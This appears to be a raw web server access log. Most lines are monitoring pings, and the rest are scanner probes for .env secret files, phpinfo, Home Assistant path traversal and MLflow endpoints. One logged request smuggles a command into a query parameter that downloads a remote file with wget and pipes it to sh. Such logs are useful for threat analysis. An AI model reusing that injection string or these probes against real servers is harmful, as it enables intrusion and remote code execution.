212.91.247.32 - - [02/Jul/2025:13:16:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:18:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:19:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:20:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:21:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:27:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:28:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:29:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:30:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.149 - - [02/Jul/2025:13:31:18 +0200] "GET http://ifconfig.me/ HTTP/1.1" 200 1229 "-" "curl/7.81.0"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/7 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/7 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/3 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/3 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/6 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/1 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/5 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Mobile/15E148 Safari/604.1"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/4 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/9 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/5 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/2 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/3 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.2; rv:137.0) Gecko/20100101 Firefox/137.0"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/4 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/1 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/2 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/6 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/7 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/10 HTTP/1.1" 404 323 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/9 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/5 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/1 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/2 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/6 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/110.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/10 HTTP/1.1" 404 323 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:51 +0200] "GET /api/v1/database/4 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:13:31:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:13:31:58 +0200] "GET /api/v1/database/9 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:58 +0200] "GET /api/v1/database/1 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
77.90.153.48 - - [02/Jul/2025:13:31:58 +0200] "GET /api/v1/database/3 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:58 +0200] "GET /api/v1/database/2 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:58 +0200] "GET /api/v1/database/4 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:13:31:58 +0200] "GET /api/v1/database/10 HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/9 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/114.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/10 HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/E7FBAF"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/4 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/9 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/6 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/1 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/7 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (SS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/10 HTTP/1.1" 404 323 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/3 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/5 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/7 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/2 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/6 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:13:31:59 +0200] "GET /api/v1/database/5 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (SS; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
212.91.247.32 - - [02/Jul/2025:13:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:34:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.155.40.111 - - [02/Jul/2025:13:35:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
212.91.247.32 - - [02/Jul/2025:13:35:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [02/Jul/2025:13:36:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.90.153.48 - - [02/Jul/2025:13:36:40 +0200] "GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0"
77.90.153.48 - - [02/Jul/2025:13:36:47 +0200] "GET /api/hassio/app/.%09./supervisor/info HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
77.90.153.48 - - [02/Jul/2025:13:36:54 +0200] "GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:13:36:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:37:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:38:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:39:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:40:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:41:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:42:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:43:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.129.130 - - [02/Jul/2025:13:44:01 +0200] "GET /metrics HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:13:44:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.179 - - [02/Jul/2025:13:45:17 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko"
78.153.140.179 - - [02/Jul/2025:13:45:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.179 - - [02/Jul/2025:13:45:18 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
78.153.140.179 - - [02/Jul/2025:13:45:18 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
78.153.140.179 - - [02/Jul/2025:13:45:18 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413"
78.153.140.179 - - [02/Jul/2025:13:45:18 +0200] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Android 5.1.1; Mobile; rv:48.0) Gecko/48.0 Firefox/48.0"
78.153.140.179 - - [02/Jul/2025:13:45:18 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.125 Safari/537.36 OPR/30.0.1835.88"
78.153.140.179 - - [02/Jul/2025:13:45:19 +0200] "GET /?phpinfo=-1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.2.2.0 Safari/537.31"
212.91.247.32 - - [02/Jul/2025:13:45:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:13:46:46 +0200] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
77.90.153.48 - - [02/Jul/2025:13:46:52 +0200] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 346 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0"
212.91.247.32 - - [02/Jul/2025:13:46:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:47:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:48:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:49:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [02/Jul/2025:13:50:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [02/Jul/2025:13:50:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:51:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:52:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.178.4.102 - - [02/Jul/2025:13:53:10 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
196.251.117.9 - - [02/Jul/2025:13:53:22 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/69.0.3497.81 Chrome/69.0.3497.81 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:13:53:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
196.251.117.9 - - [02/Jul/2025:13:54:09 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
196.251.117.9 - - [02/Jul/2025:13:54:49 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:13:54:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:55:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.46 - - [02/Jul/2025:13:56:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:13:56:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:13:57:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:13:57:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:58:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:13:59:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:14:00:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:14:01:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [02/Jul/2025:14:02:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:14:02:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.219 - - [02/Jul/2025:14:03:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.84.130 - - [02/Jul/2025:14:03:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:14:03:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:14:04:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:14:05:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:14:06:33 +0200] "GET /vpn/list_base_config.php?type=mod&parts=base_config&template=`wget+http://220.158.234.135/x/raisecom+-O-|sh` HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:14:06:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
196.251.117.9 - - [02/Jul/2025:14:07:38 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15"
212.91.247.32 - - [02/Jul/2025:14:07:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.80.240.64 - - [02/Jul/2025:14:07:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:14:08:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:14:09:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:14:10:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
178.62.216.118 - - [02/Jul/2025:14:10:06 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
204.76.203.219 - - [02/Jul/2025:14:10:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.3.221.137 - - [02/Jul/2025:14:10:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
178.62.216.118 - - [02/Jul/2025:14:10:21 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
178.62.216.118 - - [02/Jul/2025:14:10:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
180.241.46.215 - - [02/Jul/2025:14:10:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:14:10:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:14:11:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.223.109.44 - - [02/Jul/2025:14:12:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
